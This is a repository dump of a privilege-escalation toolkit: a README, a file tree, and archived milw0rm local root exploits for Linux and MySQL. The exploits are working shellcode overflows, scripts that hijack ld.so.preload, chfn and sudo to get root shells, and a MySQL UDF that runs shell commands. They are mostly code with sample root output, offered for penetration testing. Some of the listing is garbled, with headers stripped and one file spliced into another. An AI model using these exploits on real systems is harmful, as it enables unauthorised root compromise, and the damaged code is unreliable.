├── README.md ├── linux ├── linux_exploits │ ├── 9545 │ ├── 10018.sh │ ├── 10022.c │ ├── 10038.txt │ ├── 10060.sh │ ├── 1009.c │ ├── 1029.c │ ├── 10313.c │ ├── 10396.pl │ ├── 104.c │ ├── 10487.txt │ ├── 106.c │ ├── 10613.c │ ├── 10617.txt │ ├── 1154.pl │ ├── 11650.c │ ├── 1170.c │ ├── 1181.c │ ├── 1187.c │ ├── 12.c │ ├── 120.c │ ├── 12130.py │ ├── 1215.c │ ├── 1229.sh │ ├── 1267.c │ ├── 129.asm │ ├── 1297.py │ ├── 1299.sh │ ├── 1300.sh │ ├── 131.c │ ├── 1310.txt │ ├── 1316.pl │ ├── 1397.c │ ├── 140.c │ ├── 141.c │ ├── 1412.rb │ ├── 1415.c │ ├── 142.c │ ├── 1425.c │ ├── 14273.sh │ ├── 14339.sh │ ├── 144.c │ ├── 1445.c │ ├── 1449.c │ ├── 145.c │ ├── 14814.c │ ├── 14830.py │ ├── 15023.c │ ├── 15024.c │ ├── 15074.sh │ ├── 15150.c │ ├── 15155.c │ ├── 1518.c │ ├── 152.c │ ├── 15274. │ ├── 15274.txt │ ├── 15285.c │ ├── 15304.txt │ ├── 154.c │ ├── 15620.sh │ ├── 15704.c │ ├── 15745.txt │ ├── 15774.c │ ├── 1579.pl │ ├── 1591.py │ ├── 15916.c │ ├── 15944.c │ ├── 1596.txt │ ├── 15974.txt │ ├── 160.c │ ├── 16086.txt │ ├── 17083.pl │ ├── 17147.txt │ ├── 178.c │ ├── 180.c │ ├── 182.sh │ ├── 183.c │ ├── 1831.txt │ ├── 184.pl │ ├── 186.pl │ ├── 193.sh │ ├── 2004.c │ ├── 2005.c │ ├── 2006.c │ ├── 2009-therebel.tgz │ ├── 2009-wunderbar_emporium.tgz │ ├── 2011.sh │ ├── 2013.c │ ├── 2015.py │ ├── 2016.sh │ ├── 203.sh │ ├── 2031.c │ ├── 205.pl │ ├── 206.c │ ├── 209.c │ ├── 21.c │ ├── 2144.sh │ ├── 215.c │ ├── 216.c │ ├── 217.c │ ├── 218.c │ ├── 219.c │ ├── 2193.php │ ├── 221.c │ ├── 222.c │ ├── 229.c │ ├── 231.sh │ ├── 2338.c │ ├── 2404.c │ ├── 2466.pl │ ├── 249.c │ ├── 2492.s │ ├── 252.pl │ ├── 255.pl │ ├── 257.pl │ ├── 258.sh │ ├── 2581.c │ ├── 260.c │ ├── 273.c │ ├── 285.c │ ├── 290.sh │ ├── 3.c │ ├── 31.pl │ ├── 3154.c │ ├── 317.txt │ ├── 319.c │ ├── 320.pl │ ├── 3213.c │ ├── 322.c │ ├── 325.c │ ├── 331.c │ ├── 3330.pl │ ├── 3333.pl │ ├── 3384.c │ ├── 339.c │ ├── 3426.php │ ├── 3427.php │ ├── 3440.php │ ├── 34536.sh │ ├── 3479.php │ ├── 3480.php │ ├── 3499.php │ ├── 3525.php │ ├── 
3529.php │ ├── 3571.php │ ├── 3572.php │ ├── 3587.c │ ├── 3595.c │ ├── 36108.c │ ├── 369.pl │ ├── 36901-1.c │ ├── 3730.txt │ ├── 374.c │ ├── 375.c │ ├── 393.c │ ├── 394.c │ ├── 40.pl │ ├── 4028.txt │ ├── 411.c │ ├── 417.c │ ├── 4172.c │ ├── 434.sh │ ├── 438.c │ ├── 4460.c │ ├── 466.pl │ ├── 469.c │ ├── 4698.c │ ├── 470.c │ ├── 4756.c │ ├── 476.c │ ├── 479.c │ ├── 5092.c │ ├── 5093.c │ ├── 5167.sh │ ├── 5424.txt │ ├── 586.c │ ├── 587.c │ ├── 591.c │ ├── 600.c │ ├── 601.c │ ├── 6032.py │ ├── 624.c │ ├── 6337.sh │ ├── 657.c │ ├── 669.c │ ├── 684.c │ ├── 6851.c │ ├── 695.c │ ├── 71.c │ ├── 7177.c │ ├── 718.c │ ├── 72.c │ ├── 7313.sh │ ├── 7393.txt │ ├── 741.pl │ ├── 744.c │ ├── 75.c │ ├── 756.c │ ├── 7618.c │ ├── 763.c │ ├── 7681.txt │ ├── 776.c │ ├── 778.c │ ├── 779.sh │ ├── 7855.txt │ ├── 7856.txt │ ├── 788.pl │ ├── 791.c │ ├── 792.c │ ├── 796.sh │ ├── 816.c │ ├── 824.c │ ├── 8303.c │ ├── 8369.sh │ ├── 8470.py │ ├── 8478.sh │ ├── 8534.c │ ├── 8572.c │ ├── 8673.c │ ├── 8678.c │ ├── 876.c │ ├── 877.pl │ ├── 890.pl │ ├── 895.c │ ├── 9083.c │ ├── 91.c │ ├── 913.pl │ ├── 9135.sh │ ├── 914.c │ ├── 9191.txt │ ├── 9208.txt │ ├── 924.c │ ├── 926.c │ ├── 93.c │ ├── 9302.py │ ├── 9352.c │ ├── 9363.c │ ├── 9435.txt │ ├── 9436.sh │ ├── 9436.txt │ ├── 9436a.c │ ├── 9436b.c │ ├── 9477.txt │ ├── 9479.c │ ├── 950.c │ ├── 9513.c │ ├── 9521.c │ ├── 9542.c │ ├── 9543.c │ ├── 9545.c │ ├── 9574.txt │ ├── 9575.c │ ├── 9595.c │ ├── 9598.txt │ ├── 9608.c │ ├── 9627.txt │ ├── 9641.txt │ ├── 9709.txt │ ├── 973.c │ ├── 974.pl │ ├── 9844.py │ ├── 997.sh │ ├── android-root-20090816.tar.gz │ ├── android-root │ │ ├── Android.mk │ │ ├── Makefile │ │ ├── armelf.x │ │ ├── asroot.c │ │ ├── own.c │ │ └── rootsh.c │ ├── calls.dat │ ├── dirtyc0w.c │ ├── exploit1.c │ ├── exploit10.c │ ├── exploit11.c │ ├── exploit12.c │ ├── exploit2.c │ ├── exploit3.c │ ├── exploit4.c │ ├── exploit5.c │ ├── exploit6.c │ ├── exploit7.c │ ├── exploit8.c │ ├── exploit9.c │ ├── exploitall │ ├── exploitc.c │ ├── 
linux_local_exploits.tar.gz │ ├── local_linux_rootkit.tar.gz │ ├── suid.c │ ├── suid_local_root_centos5_exploit │ ├── therebel │ │ ├── exploit.c │ │ ├── pwnkernel.c │ │ └── therebel.sh │ ├── udev_txt │ └── wunderbar_emporium │ │ ├── exploit.c │ │ ├── exploit.so │ │ ├── pwnkernel │ │ ├── pwnkernel.c │ │ ├── tzameti.avi │ │ └── wunderbar_emporium.sh └── scripts │ ├── linux_checksec.sh │ ├── linux_enum.sh │ ├── linux_gather_files.sh │ ├── linux_kernel_exploiter.pl │ ├── linux_privesc.py │ ├── linux_privesc.sh │ └── linux_security_test ├── mysql ├── lib_mysqludf_sys_0.0.3.tar.gz ├── raptor_udf.c └── raptor_udf2.c └── windows ├── windows-privesc-check.exe ├── windows-privesc-check.py └── windows-privesc-check ├── COPYING.GPL ├── COPYING.WINDOWS-PRIVESC-CHECK ├── windows-privesc-check.exe └── windows-privesc-check.py
/README.md:
--------------------------------------------------------------------------------
1 | # PrivEsc by 1N3@CrowdShield
2 | http://crowdshield.com
3 | 
4 | ## ABOUT:
5 | A collection of Windows, Linux and MySQL privilege escalation scripts and exploits. Most of the Linux exploits are archived milw0rm/Exploit-DB entries: they embed raw shellcode and hard-coded 32-bit stack addresses for specific, long-patched targets, and several are shipped only as pre-built binaries or tarballs. Read and rebuild each one yourself before use, and run it only against systems you are authorised to test.
6 | 
7 | ## LINKS:
8 | For pre-compiled local Linux exploits, check out https://www.kernel-exploits.com. These are third-party binaries: prefer building from source you have read, and treat anything downloaded pre-built as untrusted until you have verified it.
9 | 
10 | ## DONATIONS:
11 | Donations are welcome.
12 | - [x] BTC 1Fav36btfmdrYpCAR65XjKHhxuJJwFyKum
13 | - [x] DASH XoWYdMDGb7UZmzuLviQYtUGb5MNXSkqvXG
14 | - [x] ETH 0x20bB09273702eaBDFbEE9809473Fd04b969a794d
15 | - [x] LTC LQ6mPewec3xeLBYMdRP4yzeta6b9urqs2f
--------------------------------------------------------------------------------
/linux/linux_exploits/10018.sh:
--------------------------------------------------------------------------------
1 | while : ; do
2 | { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
3 | PID=$!
4 | OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
5 | { read PID REST ; echo $PID; } )
6 | OUT="${OUT%% *}"
7 | DELAY=$((RANDOM * 1000 / 32768))
8 | usleep $((DELAY * 1000 + RANDOM % 1000 ))
9 | echo n > /proc/$OUT/fd/1 # Trigger defect
10 | done
--------------------------------------------------------------------------------
/linux/linux_exploits/10022.c:
--------------------------------------------------------------------------------
1 | /*
2 |  * PoC: bind an AF_UNIX stream listener, shut it down, then connect() to it
3 |  * in a tight loop.  The loop ends only when connect() fails (perror + break)
4 |  * or when alarm(15) fires; what an affected kernel does in between is not
5 |  * recorded in this copy.
6 |  *
7 |  * NOTE(review): the #include names were lost in this listing.  The calls
8 |  * used here are declared in <sys/socket.h>, <sys/un.h>, <unistd.h>,
9 |  * <string.h> and <stdio.h>; restore them before building.
10 |  * NOTE(review): socket()/bind()/listen() results are unchecked and the
11 |  * client sockets are never closed -- acceptable for a 15-second PoC only.
12 |  */
13 | int main(void)
14 | {
15 |     int ret;
16 |     int csd;                /* client (connecting) socket, re-created each iteration */
17 |     int lsd;                /* listening socket */
18 |     struct sockaddr_un sun;
19 | 
20 |     /* make an abstract name address: sun_path[0] stays 0 after the memset,
21 |      * so the name lives in the Linux abstract namespace (no filesystem
22 |      * entry); using the PID keeps concurrent runs from colliding */
23 |     memset(&sun, 0, sizeof(sun));
24 |     sun.sun_family = PF_UNIX;
25 |     sprintf(&sun.sun_path[1], "%d", getpid());
26 | 
27 |     /* create the listening socket and shut it down; the connect loop
28 |      * below then targets this already-shut-down listener */
29 |     lsd = socket(AF_UNIX, SOCK_STREAM, 0);
30 |     bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
31 |     listen(lsd, 1);
32 |     shutdown(lsd, SHUT_RDWR);
33 | 
34 |     /* connect loop */
35 |     alarm(15); /* SIGALRM (default action: terminate) forcibly ends the run after 15 s */
36 |     for (;;) {
37 |         csd = socket(AF_UNIX, SOCK_STREAM, 0);
38 |         ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
39 |         if (-1 == ret) {
40 |             perror("connect()");
41 |             break;
42 |         }
43 |         puts("Connection OK");
44 |     }
45 |     return 0;
46 | }
--------------------------------------------------------------------------------
/linux/linux_exploits/1029.c:
--------------------------------------------------------------------------------
1 | /* epsxe-e.c
2 | ePSXe v1.* local exploit
3 | By: Qnix
4 | e-mail: q-nix[at]hotmail[dot]com
5 | ePSXe-website: www.epsxe.com
6 | 
7 | EXP-Sample:
8 | 
9 | root@Qnix:~/epsxe# gcc -o epsxe-e epsxe-e.c
10 | root@Qnix:~/epsxe# ./epsxe-e
11 | 
12 | *************************************
13 | ePSXe v1.* local exploit
14 | by
15 | Qnix | Q-nix[at]hotmail[dot]com
16 | *************************************
17 | 
18 | [~] Stack pointer (ESP) : 0xbffff568
19 | [~] Offset from ESP : 0x0
20 | [~] Desired Return Addr : 0xbffff568
21 | 
22 | * Running ePSXe emulator version 1.6.0.
23 | * Memory handlers init. 24 | sh-2.05b# id 25 | uid=0(root) gid=0(root) 26 | groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) 27 | 28 | 29 | 30 | 31 | */ 32 | 33 | 34 | #include 35 | 36 | char shellcode[] = 37 | "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" 38 | "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" 39 | "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" 40 | "\x68"; 41 | 42 | unsigned long sp(void) 43 | { __asm__("movl %esp, %eax");} 44 | 45 | int main(int argc, char *argv[]) 46 | { 47 | int i, offset; 48 | long esp, ret, *addr_ptr; 49 | char *buffer, *ptr; 50 | 51 | offset = 0; 52 | esp = sp(); 53 | ret = esp - offset; 54 | 55 | printf("\n ************************************* \n"); 56 | printf(" ePSXe v1.* local exploit \n"); 57 | printf(" by \n"); 58 | printf(" Qnix | Q-nix[at]hotmail[dot]com "); 59 | printf("\n ************************************* \n\n"); 60 | printf("[~] Stack pointer (ESP) : 0x%x\n", esp); 61 | printf("[~] Offset from ESP : 0x%x\n", offset); 62 | printf("[~] Desired Return Addr : 0x%x\n\n", ret); 63 | 64 | buffer = malloc(600); 65 | 66 | ptr = buffer; 67 | addr_ptr = (long *) ptr; 68 | for(i=0; i < 600; i+=4) 69 | { *(addr_ptr++) = ret; } 70 | 71 | for(i=0; i < 200; i++) 72 | { buffer[i] = '\x90'; } 73 | 74 | ptr = buffer + 200; 75 | for(i=0; i < strlen(shellcode); i++) 76 | { *(ptr++) = shellcode[i]; } 77 | 78 | buffer[600-1] = 0; 79 | 80 | execl("./epsxe", "epsxe", "-nogui", buffer, 0); 81 | 82 | free(buffer); 83 | 84 | return 0; 85 | } 86 | 87 | // milw0rm.com [2005-06-04] 88 | -------------------------------------------------------------------------------- /linux/linux_exploits/104.c: -------------------------------------------------------------------------------- 1 | /* 0x333hztty => hztty 2.0 local root exploit 2 | * 3 | * 4 | * more info : Debian Security Advisory DSA 385-1 5 | * 6 | * *note* I adjusted some part of hztty's code since 7 | * there were 
some errors. hope this will not influence 8 | * exploitation :> tested against Red Hat 9.0 : 9 | * 10 | * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k 11 | * [c0wboy@0x333 c0wboy]$ ./k 12 | * 13 | * --- local root exploit for hztty 2.0 --- 14 | * --- coded by c0wboy ~ 0x33 --- 15 | * 16 | * sh-2.05b# [./hztty started] [using /dev/ttyp6] 17 | * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy) 18 | * sh-2.05b# 19 | * 20 | * coded by c0wboy 21 | * 22 | * (c) 0x333 Outsiders Security Labs 23 | * 24 | */ 25 | 26 | #include 27 | #include 28 | 29 | #define BIN "./hztty" 30 | #define SIZE 272 31 | 32 | 33 | unsigned char shellcode[] = 34 | "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8" 35 | "\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68" 36 | "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31" 37 | "\xd2\xb0\x0b\xcd\x80" ; 38 | 39 | int main() 40 | { 41 | int i; 42 | char out[SIZE]; 43 | char *own[] = { shellcode, 0x0 }; 44 | 45 | int *hztty = (int *)(out); 46 | int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode); 47 | 48 | for (i=0 ; i ii+1) // -i imageDirectory 27 | strcpy(imagedirk,argv[++ii]); //Overflow 28 | else if (strEqu(argv[ii],"-f") && argc > ii+1) // -f imageFile 29 | 30 | strcpy(clfile,argv[++ii]); //Overflow 31 | else strcpy(clfile,argv[ii]); //Overflow // assume imageFile 32 | } 33 | ...... 34 | 35 | Proof Of Concept: 36 | Image filename overflow: 37 | 38 | $ ./printoxx -i $(python -c 'print "A"*1000') 39 | 40 | Directory filename overflow: 41 | $ ./printoxx -f $(python -c 'print "A"*1000') 42 | 43 | Severity: Very Low 44 | 45 | Note: Since this was tested on Fedora 12, the system automatically detected the operation as a possible buffer overflow attempt instead of a regular segfault. This is due to the fact that all executables on Red-Hat 46 | 47 | RHEL and Fedora systems are compiled with canaries enabled. 
48 | 
49 | #$
50 | 
51 | 
--------------------------------------------------------------------------------
/linux/linux_exploits/1181.c:
--------------------------------------------------------------------------------
1 | /*
2 |  * $Id: raptor_udf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $
3 |  *
4 |  * raptor_udf.c - dynamic library for do_system() MySQL UDF
5 |  * Copyright (c) 2004 Marco Ivaldi
6 |  *
7 |  * This is a helper dynamic library for local privilege escalation through
8 |  * MySQL run with root privileges (very bad idea!). Tested on MySQL 4.0.17.
9 |  *
10 |  * Code ripped from: http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
11 |  *
12 |  * "MySQL provides a mechanism by which the default set of functions can be
13 |  * expanded by means of custom written dynamic libraries containing User
14 |  * Defined Functions, or UDFs". -- Hackproofing MySQL
15 |  *
16 |  * Usage:
17 |  * $ id
18 |  * uid=500(raptor) gid=500(raptor) groups=500(raptor)
19 |  * $ gcc -g -c raptor_udf.c
20 |  * $ gcc -g -shared -Wl,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
21 |  * $ mysql -u root -p
22 |  * Enter password:
23 |  * [...]
24 |  * mysql> use mysql;
25 |  * mysql> create table foo(line blob);
26 |  * mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
27 |  * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
28 |  * mysql> create function do_system returns integer soname 'raptor_udf.so';
29 |  * mysql> select * from mysql.func;
30 |  * +-----------+-----+---------------+----------+
31 |  * | name      | ret | dl            | type     |
32 |  * +-----------+-----+---------------+----------+
33 |  * | do_system |   2 | raptor_udf.so | function |
34 |  * +-----------+-----+---------------+----------+
35 |  * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
36 |  * mysql> \! sh
37 |  * sh-2.05b$ cat /tmp/out
38 |  * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
39 |  * [...]
40 |  */
41 | 
42 | /* NOTE(review): the #include names were lost in this listing; system(3) is
43 |  * declared in <stdlib.h> -- restore the headers before building. */
44 | #include
45 | #include
46 | 
47 | /* Local copies of the MySQL UDF API types (UDF_ARGS / UDF_INIT) so the
48 |  * library builds without the server headers.  NOTE(review): they reflect
49 |  * the layout of the version this was tested on (see header); a layout
50 |  * mismatch with the target's MySQL would make args/arg_count read garbage
51 |  * -- confirm against the target build. */
52 | enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
53 | 
54 | typedef struct st_udf_args {
55 |     unsigned int arg_count;         // number of arguments
56 |     enum Item_result *arg_type;     // pointer to item_result
57 |     char **args;                    // pointer to arguments
58 |     unsigned long *lengths;         // length of string args
59 |     char *maybe_null;               // 1 for maybe_null args
60 | } UDF_ARGS;
61 | 
62 | typedef struct st_udf_init {
63 |     char maybe_null;                // 1 if func can return NULL
64 |     unsigned int decimals;          // for real functions
65 |     unsigned long max_length;       // for string functions
66 |     char *ptr;                      // free ptr for func data
67 |     char const_item;                // 0 if result is constant
68 | } UDF_INIT;
69 | 
70 | /*
71 |  * UDF entry point for `SELECT do_system('<shell command>')`.
72 |  *
73 |  * The single argument is handed to system(3) verbatim, so any SQL user
74 |  * allowed to call this function runs arbitrary shell commands as the
75 |  * mysqld account -- root, in the scenario described in the header above.
76 |  * Only the argument count is validated: arg_type is not checked, and the
77 |  * is_null/error out-parameters are never set.  The SQL-level result is
78 |  * always 0; system()'s exit status is discarded.
79 |  *
80 |  * NOTE(review): UDF_ARGS carries explicit lengths[], which suggests string
81 |  * arguments need not be NUL-terminated, while system() requires one --
82 |  * confirm against the target MySQL version before relying on this.
83 |  */
84 | int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
85 | {
86 |     if (args->arg_count != 1)   /* wrong arity: silently do nothing */
87 |         return(0);
88 | 
89 |     system(args->args[0]);      /* unvalidated command string -> shell */
90 | 
91 |     return(0);
92 | }
93 | 
94 | // milw0rm.com [2004-12-24]
95 | 
--------------------------------------------------------------------------------
/linux/linux_exploits/120.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/120.c
--------------------------------------------------------------------------------
/linux/linux_exploits/1215.c:
--------------------------------------------------------------------------------
1 | // (if the iwconfig executable is setuid) /str0ke
2 | 
3 | #include
4 | #include
5 | #include
6 | #include
7 | 
8 | /* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */
9 | char shellcode[]=
10 | "\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
11 | "\x73\x68\x68\x2f\x62\x69\x6e\x89"
12 | "\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
13 | "\x0b\x51\x52\x55\x89\xe5\x0f\x34"
14 | "\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
15 | "\x55\x89\xe5\x0f\x34";
16 | 
17 | int main(int argc,char **argv){
18 | char buf[96];
19 | long esp, *addr_ptr;
20 
| unsigned long ret; 21 | int i, offset; 22 | unsigned long sp(void) 23 | { __asm__("movl %esp, %eax");} 24 | char *prog[]={argv[1],buf,NULL}; 25 | char *env[]={"3v1lsh3ll0=",shellcode,NULL}; 26 | 27 | if (argc >= 2) { 28 | printf("\n*********************************************\n"); 29 | printf(" iwconfig Version 26 Localroot Exploit \n"); 30 | printf(" Coded by Qnix[at]bsdmail[dot]org \n"); 31 | printf("*********************************************\n\n"); 32 | } else { 33 | printf("\n*********************************************\n"); 34 | printf(" iwconfig Version 26 Localroot Exploit \n"); 35 | printf(" Coded by Qnix[at]bsdmail[dot]org \n"); 36 | printf("*********************************************\n\n"); 37 | printf("\n USEAGE: ./iwconfig-exploit \n\n"); 38 | return 1; 39 | } 40 | 41 | offset = 0; 42 | esp = sp(); 43 | ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06; 44 | printf("[~] S-p.ESP : 0x%x\n", esp); 45 | printf("[~] O-F.ESP : 0x%x\n", offset); 46 | printf("[~] Return Addr : 0x%x\n\n", ret); 47 | 48 | memset(buf,0x41,sizeof(buf)); 49 | memcpy(&buf[92],&ret,4); 50 | 51 | execve(prog[0],prog,env); 52 | 53 | } 54 | 55 | // milw0rm.com [2005-09-14] 56 | -------------------------------------------------------------------------------- /linux/linux_exploits/1229.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # tested and working /str0ke 3 | ########################################################################### 4 | # Linux Qpopper poppassd latest version local r00t exploit by kcope ### 5 | # August 2005 ### 6 | # Confidential - Keep Private! ### 7 | ########################################################################### 8 | 9 | POPPASSD_PATH=/usr/local/bin/poppassd 10 | 11 | echo "" 12 | echo "Linux Qpopper poppassd latest version local r00t exploit by kcope" 13 | echo "" 14 | sleep 2 15 | umask 0000 16 | if [ -f /etc/ld.so.preload ]; then 17 | echo "OOPS /etc/ld.so.preload already exists.. 
exploit failed!" 18 | exit 19 | fi 20 | cat > program.c << _EOF 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | void _init() 27 | { 28 | if (!geteuid()) { 29 | setgid(0); 30 | setuid(0); 31 | remove("/etc/ld.so.preload"); 32 | execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL); 33 | } 34 | } 35 | 36 | _EOF 37 | gcc -o program.o -c program.c -fPIC 38 | gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles 39 | cat > suid.c << _EOF 40 | int main(void) { 41 | setgid(0); setuid(0); 42 | unlink("/tmp/suid"); 43 | execl("/bin/sh","sh",0); } 44 | _EOF 45 | 46 | gcc -o /tmp/suid suid.c 47 | cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 48 | echo "--- Now type ENTER ---" 49 | echo "" 50 | $POPPASSD_PATH -t /etc/ld.so.preload 51 | echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload 52 | su 53 | if [ -f /tmp/suid ]; then 54 | echo "IT'S A ROOTSHELL!!!" 55 | /tmp/suid 56 | else 57 | echo "Sorry, exploit failed." 58 | fi 59 | 60 | # milw0rm.com [2005-09-24] 61 | -------------------------------------------------------------------------------- /linux/linux_exploits/1299.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0 4 | # and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug. 5 | # 6 | # by Hunger 7 | # 8 | # Advistory: 9 | # http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html 10 | # 11 | # hunger@suse:~> id 12 | # uid=1000(hunger) gid=1000(hunger) groups=1000(hunger) 13 | # hunger@suse:~> ./susechfn.sh 14 | # Type your current password to get root... :) 15 | # Password: 16 | # sh-2.05b# id 17 | # uid=0(r00t) gid=0(root) groups=0(root) 18 | 19 | if [ X"$SHELL" = "X" ]; then 20 | echo "No SHELL environment, using /bin/sh for default." 
21 | export SHELL=/bin/sh 22 | fi 23 | 24 | if [ -u /usr/bin/chfn ]; then 25 | /bin/echo "Type your current password to get root... :)" 26 | /usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null 27 | if [ -u /bin/su ]; then 28 | /bin/su r00t 29 | /bin/echo "You can get root again with 'su r00t'" 30 | else 31 | echo "/bin/su file is not setuid root :(" 32 | fi 33 | else 34 | echo "/usr/bin/chfn file is not setuid root :(" 35 | fi 36 | 37 | # milw0rm.com [2005-11-08] 38 | -------------------------------------------------------------------------------- /linux/linux_exploits/1310.txt: -------------------------------------------------------------------------------- 1 | ## Sudo local root escalation privilege ## 2 | ## vuln versions : sudo < 1.6.8p10 3 | ## by breno 4 | 5 | ## You need sudo access execution for some bash script ## 6 | ## Use csh shell to change SHELLOPTS env ## 7 | 8 | ie: 9 | %cat x.sh 10 | #!/bin/bash -x 11 | 12 | echo "Getting root!!" 13 | % 14 | ## 15 | 16 | ## 17 | # cat /etc/sudoers 18 | ... 19 | breno ALL=(ALL) /home/breno/x.sh 20 | .. 21 | # 22 | 23 | ## Let's use an egg shell :) 24 | %cat egg.c 25 | 26 | #include 27 | 28 | int main() 29 | { 30 | setuid(0); 31 | system("/bin/sh"); 32 | } 33 | % 34 | 35 | % gcc -o egg egg.c 36 | % setenv SHELLOPTS xtrace 37 | % setenv PS4 '$(chown root:root egg)' 38 | % sudo ./x.sh 39 | echo Getting root!! 40 | Getting root!! 41 | % ls -lisa egg 42 | 1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg 43 | % setenv PS4 '$(chmod +s egg)' 44 | % sudo ./x.sh 45 | echo Getting root!! 46 | Getting root!! 
47 | % ./egg 48 | sh-3.00# id 49 | uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno) 50 | sh-3.00# 51 | 52 | # milw0rm.com [2005-11-09] 53 | -------------------------------------------------------------------------------- /linux/linux_exploits/1316.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # 3 | # Veritas Storage Foundation 4.0 4 | # 5 | # http://www.digitalmunition.com 6 | # kf (kf_lists[at]digitalmunition[dot]com) - 08/19/2005 7 | # 8 | # This bug has not been patched as of: 9 | # Q14438H.sf.4.0.00.0.rhel3_i686.tar.gz 10 | # 11 | # Make sure you don't get your sploits from some 12 | # Frenchie at FR-SIRT go to milw0rm instead. 13 | # 14 | $retval = 0xbffffc17; 15 | 16 | $tgts{"0"} = "/opt/VRTSvcs/bin/haagent:72"; 17 | $tgts{"1"} = "/opt/VRTSvcs/bin/haalert:72"; 18 | $tgts{"2"} = "/opt/VRTSvcs/bin/haattr:72"; 19 | $tgts{"3"} = "/opt/VRTSvcs/bin/hacli:72"; 20 | $tgts{"4"} = "/opt/VRTSvcs/bin/hareg:72"; 21 | $tgts{"5"} = "/opt/VRTSvcs/bin/haclus:72"; 22 | $tgts{"6"} = "/opt/VRTSvcs/bin/haconf:72"; 23 | $tgts{"7"} = "/opt/VRTSvcs/bin/hadebug:72"; 24 | $tgts{"8"} = "/opt/VRTSvcs/bin/hagrp:72"; 25 | $tgts{"9"} = "/opt/VRTSvcs/bin/hahb:72"; 26 | $tgts{"10"} = "/opt/VRTSvcs/bin/halog:72"; 27 | $tgts{"11"} = "/opt/VRTSvcs/bin/hares:72"; 28 | $tgts{"12"} = "/opt/VRTSvcs/bin/hastatus:72"; 29 | $tgts{"13"} = "/opt/VRTSvcs/bin/hasys:72"; 30 | $tgts{"14"} = "/opt/VRTSvcs/bin/hatype:72"; 31 | $tgts{"15"} = "/opt/VRTSvcs/bin/hauser:72"; 32 | $tgts{"16"} = "/opt/VRTSvcs/bin/tststew:72"; 33 | 34 | unless (($target) = @ARGV) { 35 | 36 | print "\n Veritas Storage Foundation VCSI18N_LANG overflow, kf \(kf_lists[at]digitalmunition[dot]com\) - 08/19/2005\n"; 37 | print "\n\nUsage: $0 \n\nTargets:\n\n"; 38 | 39 | foreach $key (sort(keys %tgts)) { 40 | ($a,$b) = split(/\:/,$tgts{"$key"}); 41 | print "\t$key . 
$a\n"; 42 | } 43 | 44 | print "\n"; 45 | exit 1; 46 | } 47 | 48 | $ret = pack("l", ($retval)); 49 | ($a,$b) = split(/\:/,$tgts{"$target"}); 50 | print "*** Target: $a, Len: $b\n\n"; 51 | 52 | $sc = "\x90"x1024; 53 | $sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80"; 54 | $sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"; 55 | $sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"; 56 | $sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 57 | 58 | $buf = "A" x $b; 59 | $buf .= "$ret" x 2; 60 | 61 | $ENV{"VCSI18N_LANG"} = $buf; 62 | $ENV{"DMR0x"} = $sc; 63 | 64 | exec("$a DMR0x"); 65 | 66 | # milw0rm.com [2005-11-12] 67 | -------------------------------------------------------------------------------- /linux/linux_exploits/140.c: -------------------------------------------------------------------------------- 1 | /* 0x333xsok (2) => xsok 1.02 local game exploit 2 | * 3 | * Happy new year ! (2 :) 4 | * coded by c0wboy 5 | * 6 | * (c) 0x333 Outsiders Security Labs / www.0x333.org 7 | * 8 | */ 9 | 10 | 11 | #include 